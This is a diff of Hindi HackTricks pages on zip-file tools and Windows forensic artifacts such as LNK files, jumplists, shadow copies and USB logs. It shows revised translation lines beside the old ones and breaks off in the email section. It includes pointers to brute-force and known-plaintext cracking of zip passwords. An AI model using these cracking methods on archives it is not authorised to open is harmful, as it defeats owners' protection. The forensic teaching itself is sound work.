{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रिपॉसिटरी में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**कमांड लाइन उपकरण** जो **ज़िप फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं जो ज़िप फ़ाइलें निदान, मरम्मत और क्रैकिंग के लिए हैं। यहाँ कुछ मुख्य उपयोगी उपकरण हैं:
|
||||
**कमांड-लाइन टूल्स** जो **zip फ़ाइलें** प्रबंधित करने के लिए आवश्यक हैं, zip फ़ाइलें का निदान करने, मरम्मत करने, और क्रैक करने के लिए। यहाँ कुछ मुख्य उपयोगी उपकरण हैं:
|
||||
|
||||
- **`unzip`**: बताता है कि ज़िप फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है।
|
||||
- **`zipdetails -v`**: ज़िप फ़ाइल प्रारूप क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है।
|
||||
- **`zipinfo`**: ज़िप फ़ाइल की सामग्री की सूची बनाता है बिना उन्हें निकाले।
|
||||
- **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त ज़िप फ़ाइलों को मरम्मत करने की कोशिश करें।
|
||||
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: ज़िप पासवर्ड की ब्रूट-फोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 अक्षरों तक के पासवर्ड के लिए प्रभावी है।
|
||||
- **`unzip`**: बताता है कि एक zip फ़ाइल को क्यों डीकंप्रेस नहीं किया जा सकता है।
|
||||
- **`zipdetails -v`**: zip फ़ाइल प्रारूप के क्षेत्रों का विस्तृत विश्लेषण प्रदान करता है।
|
||||
- **`zipinfo`**: उन्हें निकाले बिना zip फ़ाइल की सामग्री की सूची देता है।
|
||||
- **`zip -F input.zip --out output.zip`** और **`zip -FF input.zip --out output.zip`**: क्षतिग्रस्त zip फ़ाइलों को मरम्मत करने का प्रयास करें।
|
||||
- **[fcrackzip](https://github.com/hyc/fcrackzip)**: zip पासवर्ड का ब्रूट-फ़ोर्स क्रैकिंग के लिए एक उपकरण, जो लगभग 7 वर्णों तक के पासवर्ड के लिए प्रभावी है।
|
||||
|
||||
[ज़िप फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) ज़िप फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है।
|
||||
[Zip फ़ाइल प्रारूप विनिर्देशिका](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT) zip फ़ाइलों के संरचना और मानकों पर विस्तृत विवरण प्रदान करती है।
|
||||
|
||||
महत्वपूर्ण नोट: पासवर्ड से सुरक्षित ज़िप फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार नहीं एन्क्रिप्ट** करती हैं, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करती हैं जो इस जानकारी को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई ज़िप फ़ाइलें एक **प्लेनटेक्स्ट हमले** के लिए संवेदनशील हैं यदि किसी अनएन्क्रिप्टेड कॉपी की उपलब्ध है। एक उपलब्ध फ़ाइल का ज्ञात सामग्री का उपयोग करके ज़िप का पासवर्ड क्रैक करने के लिए यह हमला किया जा सकता है, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई ज़िप फ़ाइलें इस प्लेनटेक्स्ट हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विध
|
||||
महत्वपूर्ण है कि पासवर्ड से सुरक्षित zip फ़ाइलें **फ़ाइल नाम या फ़ाइल का आकार एन्क्रिप्ट नहीं करतीं**, जो एक सुरक्षा दोष है जिसे RAR या 7z फ़ाइलें नहीं साझा करतीं जो इस सूचना को एन्क्रिप्ट करती हैं। इसके अतिरिक्त, पुरानी ZipCrypto विधि से एन्क्रिप्ट की गई zip फ़ाइलें एक **सादाकथन हमला** के लिए विकल्पशील हैं अगर किसी अनएन्क्रिप्टेड कॉपी की एक कम्प्रेस्ड फ़ाइल उपलब्ध है। यह हमला जानी गई सामग्री का उपयोग करता है ताकि zip का पासवर्ड क्रैक किया जा सके, जो [HackThis के लेख](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) में विस्तार से वर्णित है और [इस शैक्षिक पेपर](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) में और विस्तार से समझाया गया है। हालांकि, **AES-256** एन्क्रिप्शन के साथ सुरक्षित की गई zip फ़ाइलें इस सादाकथन हमले से मुक्त हैं, संवेदनशील डेटा के लिए सुरक्षित एन्क्रिप्शन विधियों का चयन करने की महत्वता को प्रदर्शित करती है।
|
||||
|
||||
## संदर्भ
|
||||
* [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/)
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रिपॉसिटरी में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -2,19 +2,20 @@
|
|||
|
||||
## Windows आर्टिफैक्ट्स
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>HackTricks का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **ट्विटर** 🐦 पर हमें **फॉलो** करें **@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.
|
||||
* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके**.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -30,7 +31,7 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
### टाइमलाइन
|
||||
|
||||
टाइमलाइन एक Windows विशेषता है जो वेब पेजों के यातायात, संपादित दस्तावेज़ और चलाए गए एप्लिकेशनों का **कालांतरिक इतिहास** प्रदान करता है।
|
||||
टाइमलाइन एक Windows विशेषता है जो वेब पेजों के दौरे, संपादित दस्तावेज़ और चलाए गए एप्लिकेशनों का **कालांतरिक इतिहास** प्रदान करता है।
|
||||
|
||||
डेटाबेस पथ `\Users\<username>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db` में स्थित है। इस डेटाबेस को एक SQLite उपकरण के साथ खोला जा सकता है या उपकरण [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) के साथ जो 2 फ़ाइलें उत्पन्न करता है जो उपकरण [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) के साथ खोली जा सकती हैं।
|
||||
|
||||
|
@ -42,15 +43,15 @@ HackTricks का समर्थन करने के अन्य तरी
|
|||
|
||||
### रीसाइकल बिन
|
||||
|
||||
Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्राइव की रूट में फ़ोल्डर **`$Recycle.bin`** में पाया जा सकता है (`C:\$Recycle.bin`)।\
|
||||
Vista/Win7/Win8/Win10 में **रीसाइकल बिन** को ड्राइव की रूट में फ़ोल्डर **`$Recycle.bin`** में पाया जा सकता है (`C:\$Recycle.bin`)।\
|
||||
जब इस फ़ोल्डर में एक फ़ाइल हटाई जाती है तो 2 विशिष्ट फ़ाइलें बनाई जाती हैं:
|
||||
|
||||
* `$I{id}`: फ़ाइल सूचना (जब यह हटाई गई थी की तारीख}
|
||||
* `$I{id}`: फ़ाइल की जानकारी (जब यह हटाई गई थी की तारीख}
|
||||
* `$R{id}`: फ़ाइल की सामग्री
|
||||
|
||||
![](<../../../.gitbook/assets/image (486).png>)
|
||||
|
||||
इन फ़ाइलों के साथ आप उपकरण [**Rifiuti**](https://github.com/abelcheung/rifiuti2) का उपयोग करके हटाई गई फ़ाइलों का मूल पता और हटाई गई तारीख प्राप्त कर सकते हैं (Vista – Win10 के लिए `rifiuti-vista.exe` का उपयोग करें)।
|
||||
इन फ़ाइलों के साथ आप उपकरण [**Rifiuti**](https://github.com/abelcheung/rifiuti2) का उपयोग करके हटाई गई फ़ाइलों का मूल पता और हटाई गई तारीख प्राप्त कर सकते हैं (Vista - Win10 के लिए `rifiuti-vista.exe` का उपयोग करें)।
|
||||
```
|
||||
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
|
||||
```
|
||||
|
@ -58,7 +59,7 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा
|
|||
|
||||
### वॉल्यूम शैडो कॉपी
|
||||
|
||||
शैडो कॉपी एक तकनीक है जो माइक्रोसॉफ्ट विंडोज में शामिल है जो कंप्यूटर फ़ाइल या वॉल्यूम की **बैकअप कॉपियां** या स्नैपशॉट बना सकती है, भले ही वे उपयोग में हों।
|
||||
शैडो कॉपी एक तकनीक है जो माइक्रोसॉफ्ट विंडोज में शामिल है जो कंप्यूटर फ़ाइल या वॉल्यूम की **बैकअप कॉपी** या स्नैपशॉट बना सकती है, भले ही वे उपयोग में हों।
|
||||
|
||||
ये बैकअप्स आम तौर पर `\System Volume Information` में रूट फ़ाइल सिस्टम से स्थित होते हैं और उनका नाम निम्नलिखित छवि में दिखाए गए **UIDs** से मिलकर बनता है:
|
||||
|
||||
|
@ -68,11 +69,11 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा
|
|||
|
||||
![](<../../../.gitbook/assets/image (521).png>)
|
||||
|
||||
रजिस्ट्री एंट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` फ़ाइलें और कुंजीयों को शामिल करती है **जिन्हें बैकअप न करें**:
|
||||
रजिस्ट्री एंट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` फ़ाइलें और कुंजियों को शामिल करती है **जिन्हें बैकअप न करना** है:
|
||||
|
||||
![](<../../../.gitbook/assets/image (522).png>)
|
||||
|
||||
रजिस्ट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` में भी `वॉल्यूम शैडो कॉपियों` के बारे में विन्यास सूचना होती है।
|
||||
रजिस्ट्री `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` में भी `वॉल्यूम शैडो कॉपी` के बारे में विन्यास सूचना होती है।
|
||||
|
||||
### ऑफिस ऑटोसेव्ड फ़ाइलें
|
||||
|
||||
|
@ -84,16 +85,16 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा
|
|||
|
||||
### हाल की दस्तावेज़ (LNK)
|
||||
|
||||
विंडोज **स्वचालित रूप से** ये **शॉर्टकट** बनाता है जब उपयोगकर्ता एक फ़ाइल **खोलता है, उपयोग करता है या बनाता है**:
|
||||
विंडोज **स्वचालित रूप से** ये **शॉर्टकट** बनाता है जब उपयोगकर्ता **फ़ाइल खोलता है, उपयोग करता है या बनाता है**:
|
||||
|
||||
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
|
||||
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
|
||||
|
||||
जब एक फ़ोल्डर बनाया जाता है, तो एक लिंक फ़ाइल फ़ोल्डर, माता-पिता फ़ोल्डर और परदादी फ़ोल्डर का भी बनाया जाता है।
|
||||
जब एक फ़ोल्डर बनाया जाता है, तो एक लिंक फ़ाइल बनाई जाती है, जिसमें फ़ोल्डर, माता-पिता फ़ोल्डर और परदादी फ़ोल्डर का लिंक शामिल होता है।
|
||||
|
||||
ये स्वचालित रूप से बनाए गए लिंक फ़ाइलें **मूल के बारे में जानकारी रखती हैं** जैसे कि यह कोई **फ़ाइल है** या एक **फ़ोल्डर**, उस फ़ाइल के **MAC समय**, जहाँ फ़ाइल संग्रहित है और **लक्षित फ़ाइल का फ़ोल्डर**। यह जानकारी उन फ़ाइलों को पुनः प्राप्त करने के लिए उपयोगी हो सकती है जिन्हें हटा दिया गया था।
|
||||
ये स्वचालित रूप से बनाए गए लिंक फ़ाइलें **मूल के बारे में जानकारी शामिल करती हैं** जैसे कि यह कोई **फ़ाइल है** या एक **फ़ोल्डर**, उस फ़ाइल के **MAC समय**, जहाँ फ़ाइल संग्रहित है और **लक्षित फ़ाइल का फ़ोल्डर**। यह जानकारी उन फ़ाइलों को पुनः प्राप्त करने में सहायक हो सकती है जो हटा दी गई थीं।
|
||||
|
||||
इसके अलावा, लिंक फ़ाइल की **निर्मित तिथि** वह **समय** है जब मूल फ़ाइल का **पहली बार उपयोग** किया गया था और लिंक फ़ाइल का **संशोधित तिथि** वह **समय** है जब मूल फ़ाइल का **अंतिम बार उपयोग** किया गया था।
|
||||
इसके अलावा, लिंक फ़ाइल का **निर्माण तिथि** वह **समय** है जब मूल फ़ाइल का **पहली बार उपयोग** किया गया था और लिंक फ़ाइल का **संशोधित तिथि** वह **समय** है जब मूल फ़ाइल का **अंतिम बार उपयोग** किया गया था।
|
||||
|
||||
इन फ़ाइलों की जांच करने के लिए आप [**LinkParser**](http://4discovery.com/our-tools/) का उपयोग कर सकते हैं।
|
||||
|
||||
|
@ -108,7 +109,7 @@ Vista/Win7/Win8/Win10 में **रीसाइकल बिन** ड्रा
|
|||
2. लिंक एक्सेस तिथि
|
||||
3. लिंक निर्माण तिथि।
|
||||
|
||||
पहले सेट का टाइमस्टैम्प **फ़ाइल इसल्फ के टाइमस्टैम्प्स** को संदर्भित करता है। दूसरा सेट **लिंक की फ़ाइल के टाइमस्टैम्प्स** को संदर्भित करता है।
|
||||
पहले सेट का टाइमस्टैम्प फ़ाइल इसल्फ के **टाइमस्टैम्प्स** को संदर्भित करता है। दूसरा सेट लिंक फ़ाइल के **टाइमस्टैम्प्स** को संदर्भित करता है।
|
||||
|
||||
आप विंडोज CLI उपकरण चलाकर इसी जानकारी को प्राप्त कर सकते हैं: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
|
||||
```
|
||||
|
@ -116,11 +117,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
```
|
||||
### जम्पलिस्ट्स
|
||||
|
||||
ये हाल के फ़ाइलें हैं जो प्रति एप्लिकेशन द्वारा दर्शाई जाती हैं। यह एक ऐसी **सूची है जिसमें एक एप्लिकेशन द्वारा उपयोग की गई हाल की फ़ाइलें** हैं जिसे आप प्रत्येक एप्लिकेशन पर एक्सेस कर सकते हैं। ये **स्वचालित रूप से बनाई जा सकती हैं या कस्टम** हो सकती हैं।
|
||||
ये हाल के फ़ाइलें हैं जो प्रति एप्लिकेशन द्वारा दर्शाई जाती हैं। यह एक **एप्लिकेशन द्वारा उपयोग की गई हाल की फ़ाइलों की सूची** है जिसे आप प्रत्येक एप्लिकेशन पर एक्सेस कर सकते हैं। ये **स्वचालित रूप से बनाई जाती हैं या कस्टम हो सकती हैं**।
|
||||
|
||||
**स्वचालित रूप से बनाए गए जम्पलिस्ट्स** `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\` में संग्रहित होते हैं। जम्पलिस्ट्स का नाम इस प्रारूप का होता है `{id}.autmaticDestinations-ms` जहां प्रारंभिक आईडी एप्लिकेशन की आईडी होती है।
|
||||
**स्वचालित रूप से बनाए गए जम्पलिस्ट्स** `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\` में संग्रहित होते हैं। जम्पलिस्ट्स का नाम `{id}.autmaticDestinations-ms` नामक प्रारूप का होता है जहाँ प्रारंभिक आईडी एप्लिकेशन का आईडी होता है।
|
||||
|
||||
कस्टम जम्पलिस्ट्स `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` में संग्रहित होती हैं और इन्हें एप्लिकेशन द्वारा सामान्यत: कुछ **महत्वपूर्ण** घटना होने के कारण बनाया जाता है (शायद पसंदीदा के रूप में चिह्नित किया गया हो)
|
||||
कस्टम जम्पलिस्ट्स `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` में संग्रहित होती हैं और उन्हें एप्लिकेशन द्वारा सामान्यत: इसलिए बनाया जाता है क्योंकि कुछ **महत्वपूर्ण** घटना फ़ाइल के साथ हुई है (शायद पसंदीदा के रूप में चिह्नित किया गया हो)
|
||||
|
||||
किसी भी जम्पलिस्ट का **निर्माण समय** दर्शाता है **फ़ाइल तक पहुँचने का पहला समय** और **संशोधित समय** अंतिम बार।
|
||||
|
||||
|
@ -128,11 +129,11 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
|
||||
![](<../../../.gitbook/assets/image (474).png>)
|
||||
|
||||
(_कृपया ध्यान दें कि JumplistExplorer द्वारा प्रदान की गई समय चिह्नित जम्पलिस्ट फ़ाइल से संबंधित हैं_)
|
||||
(_कृपया ध्यान दें कि JumplistExplorer द्वारा प्रदान की गई समय चिह्नित किए गए वक्त संबंधित होते हैं_)
|
||||
|
||||
### शेलबैग्स
|
||||
|
||||
[**इस लिंक पर जाएं और जानें कि शेलबैग्स क्या हैं।**](interesting-windows-registry-keys.md#shellbags)
|
||||
[**इस लिंक पर जानें कि शेलबैग्स क्या हैं।**](interesting-windows-registry-keys.md#shellbags)
|
||||
|
||||
## Windows USB का उपयोग
|
||||
|
||||
|
@ -142,7 +143,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
* Microsoft Office हाल की फ़ोल्डर
|
||||
* जम्पलिस्ट्स
|
||||
|
||||
ध्यान दें कि कुछ LNK फ़ाइल मूल पथ की बजाय WPDNSE फ़ोल्डर को इंगित करती हैं:
|
||||
ध्यान दें कि कुछ LNK फ़ाइल मूल पथ की बजाय, WPDNSE फ़ोल्डर को पॉइंट करती हैं:
|
||||
|
||||
![](<../../../.gitbook/assets/image (476).png>)
|
||||
|
||||
|
@ -150,13 +151,13 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
|||
|
||||
### रजिस्ट्री सूचना
|
||||
|
||||
[जानने के लिए इस पृष्ठ की जाँच करें](interesting-windows-registry-keys.md#usb-information) कि कौन सी रजिस्ट्री कुंजीयाँ USB कनेक्टेड डिवाइस के बारे में दिलचस्प जानकारी रखती हैं।
|
||||
[जानने के लिए इस पेज की जाँच करें](interesting-windows-registry-keys.md#usb-information) कि कौन सी रजिस्ट्री कुंजीयाँ USB कनेक्टेड डिवाइस के बारे में दिलचस्प सूचना रखती हैं।
|
||||
|
||||
### setupapi
|
||||
|
||||
USB कनेक्शन किया गया था कब हुआ यह जानने के लिए फ़ाइल `C:\Windows\inf\setupapi.dev.log` की जाँच करें (खोज करें `Section start`).
|
||||
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
|
||||
### USB डिटेक्टिव
|
||||
|
||||
|
@ -166,20 +167,20 @@ USB कनेक्शन किया गया था कब हुआ यह
|
|||
|
||||
### प्लग और प्ले सफाई
|
||||
|
||||
'प्लग और प्ले सफाई' नामक निर्धारित कार्य को पुराने ड्राइवर संस्करणों को हटाने के लिए प्राथमिक रूप से डिज़ाइन किया गया है। नवीनतम ड्राइवर पैकेज संस्करण को बनाए रखने के उसके निर्दिष्ट उद्देश्य के विपरीत, ऑनलाइन स्रोत सुझाव देते हैं कि यह 30 दिनों के लिए निष्क्रिय रहे ड्राइवर्स पर भी निशाना साधता है। इस परिणामस्वरूप, पिछले 30 दिनों में कनेक्ट नहीं किए गए हटाए जा सकते हैं।
|
||||
'प्लग और प्ले सफाई' नामक निर्धारित कार्य कारीय अपडेटेड ड्राइवर संस्करणों को हटाने के लिए प्रधान रूप से डिज़ाइन किया गया है। इसके निर्दिष्ट उद्देश्य के विपरीत, ऑनलाइन स्रोत सुझाव देते हैं कि यह 30 दिनों के लिए निष्क्रिय रहे ड्राइवर्स को भी लक्षित करता है। इसके परिणामस्वरूप, पिछले 30 दिनों में कनेक्ट नहीं किए गए हटाए जा सकते हैं।
|
||||
|
||||
कार्य से संबंधित निम्नलिखित पथ पर स्थित है:
|
||||
कार्य का स्थान निम्नलिखित पथ पर है:
|
||||
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
|
||||
|
||||
कार्य की सामग्री का चित्र प्रदर्शित किया गया है:
|
||||
कार्य की सामग्री का चित्र प्रदान किया गया है:
|
||||
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
|
||||
|
||||
**कार्य के मुख्य घटक और सेटिंग्स:**
|
||||
- **pnpclean.dll**: यह DLL वास्तविक सफाई प्रक्रिया के लिए जिम्मेदार है।
|
||||
- **UseUnifiedSchedulingEngine**: `TRUE` पर सेट किया गया है, जो सामान्य कार्य निर्धारण इंजन का उपयोग करने की संकेत करता है।
|
||||
- **MaintenanceSettings**:
|
||||
- **अवधि ('P1M')**: कार्य सूचीकरणकर्ता को नियमित स्वचालित रूप से मासिक सफाई कार्य आरंभ करने के लिए निर्देशित करता है।
|
||||
- **समयसीमा ('P2M')**: यदि कार्य दो लगातार महीनों के लिए विफल हो जाता है, तो टास्क स्केड्यूलर को आपातकालीन स्वचालित रूप से मासिक सफाई कार्य को करने के लिए निर्देशित करता है।
|
||||
- **अवधि ('P1M')**: कार्य सूचीकरणकर्ता को नियमित ऑटोमैटिक रखरखाव के दौरान मासिक सफाई कार्य आरंभ करने के लिए निर्देशित करता है।
|
||||
- **समयसीमा ('P2M')**: यदि कार्य दो लगातार महीनों के लिए विफल हो जाता है, तो टास्क स्केड्यूलर को आपात सफाई कार्य करने के लिए निर्देशित करता है।
|
||||
|
||||
यह विन्यास ड्राइवरों की नियमित रखरखाव और सफाई सुनिश्चित करता है, जो लगातार विफलताओं के मामले में कार्य को पुनः प्रयास करने के लिए प्रावधान करता है।
|
||||
|
||||
|
@ -187,75 +188,75 @@ USB कनेक्शन किया गया था कब हुआ यह
|
|||
|
||||
## ईमेल
|
||||
|
||||
ईमेल में **2 दिलचस्प भाग होते हैं: हेडर्स और सामग्री**। **हेडर्स** में आप जानकारी पा सकते हैं जैसे:
|
||||
ईमेल में **2 दिलचस्प हिस्से होते हैं: हेडर्स और सामग्री**। **हेडर्स** में आप जानकारी पा सकते हैं जैसे:
|
||||
|
||||
* **कौन** ईमेल भेजा (ईमेल पता, आईपी, ईमेल को पुनर्निर्देशित करने वाले मेल सर्वर)
|
||||
* **कौन** ईमेल भेजा (ईमेल पता, आईपी, मेल सर्वर जिन्होंने ईमेल को पुनर्निर्देशित किया हो)
|
||||
* **कब** ईमेल भेजा गया था
|
||||
|
||||
